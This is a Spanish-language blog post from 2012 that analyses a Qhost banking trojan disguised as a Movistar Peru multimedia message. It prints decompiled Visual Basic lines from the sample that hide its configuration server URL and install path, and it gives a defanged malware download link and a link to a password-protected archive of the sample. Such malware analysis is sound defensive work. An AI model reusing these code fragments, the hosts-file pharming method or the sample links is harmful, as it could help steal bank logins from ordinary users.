Troyano Qhost - Falso mensaje Multimedia MOVISTAR.PE


 Aquí les traigo otro típico engaño a la pesca de desprevenidos.

Este troyano descarga la configuración, para el pharming local, desde un servidor en la nube, luego la copia dentro del archivo .host de la PC, una vez realizado esto cuando la victima visite el sitio web de su banco sera reenviado a un sitio falso. Afecta a entidades bancarias del Perú.

Link del malware: hxxp://mensajesenlinea.in/Mensaje-Multimedia-movistar.exe

Icono del falso mensaje multimedia.

Análisis en virus total con un indice bajo de detecciones.

Esta amenaza esta programada en Visual Basic y no tienen ninguna capa de Crypter, solo tiene un sencillo método para esconder las cadenas de caracteres.

Utiliza la función CHR$(xx) para pasar el código ascii a carácter


Aquí parte del código:


Configuración del troyano:

  loc_00403C62: var_68 = Chr$(%StkVar1) & Chr$(116) & Chr$(116) & Chr$(112) & Chr$(58) & Chr$(47) & Chr$(47) & Chr$(119) & Chr$(119) & Chr$(119) & Chr$(46)
  loc_00403E08: var_C0 = var_68 & Chr$(99) & Chr$(104) & Chr$(97) & Chr$(112) & Chr$(105) & Chr$(116) & Chr$(97) & Chr$(46) & Chr$(105) & Chr$(110) & Chr$(102)
  loc_00403F98: var_110 = var_C0 & Chr$(111) & Chr$(47) & Chr$(105) & Chr$(109) & Chr$(112) & Chr$(111) & Chr$(114) & Chr$(116) & Chr$(101) & Chr$(115)
  loc_00404128: var_160 = var_110 & Chr$(47) & Chr$(115) & Chr$(101) & Chr$(114) & Chr$(118) & Chr$(101) & Chr$(114) & Chr$(46) & Chr$(112) & Chr$(104)
  loc_00404150: var_168 = var_160 & Chr$(112)   



 116 116 112 58 47 47 119 119 119 46 
 99 104 97 112 105 116 97 46 105 110 102 
 111 47 105 109 112 111 114 116 101 115 
 47 115 101 114 118 101 114 46 112 104 
 112    

queda como -> http://www.chapita.info/importes/server.php

Pueden utilizar esta excelente web para verificarlo: http://home.paulschou.net/tools/xlate/

.

Nombre en el sistema del troyano :

  loc_00404A9A: var_A0 = Chr$(67) & Chr$(58) & Chr$(92) & Chr$(87) & Chr$(73) & Chr$(78) & Chr$(68) & Chr$(79) & Chr$(87) & Chr$(83) & Chr$(92) & Chr$(115)
  loc_00404C52: var_F8 = var_A0 & Chr$(121) & Chr$(115) & Chr$(116) & Chr$(101) & Chr$(109) & Chr$(51) & Chr$(50) & Chr$(92) & Chr$(84) & Chr$(101) & Chr$(108)
  loc_00404DE2: var_148 = var_F8 & Chr$(101) & Chr$(102) & Chr$(101) & Chr$(114) & Chr$(105) & Chr$(99) & Chr$(111) & Chr$(46) & Chr$(101) & Chr$(120)
  loc_00404E13: FileCopy var_44, var_148 & Chr$(101)

 -> C:\WINDOWS\system32\Teleferico.exe

También encontramos la carga de la siguiente web, seguramente para despistar.

Openhttps://www.telefonicamovistar.com.pe/CanalOnLine/LoginPersona.aspx?GuId=ad36e19c-5992-452c-bfae-567c3edc7c0d-a57939488




Cargando la URL de la configuración en Malzilla podemos observar el pharming local.

Muestra + código Basic/Assembler en http://www.mediafire.com/?kggx9q2nv3uayrn

password = infected



Es todo por el momento.


@Dkavalanche     2012


PD: Ya falta poco para la @ekoparty, reencuentro con amigos :D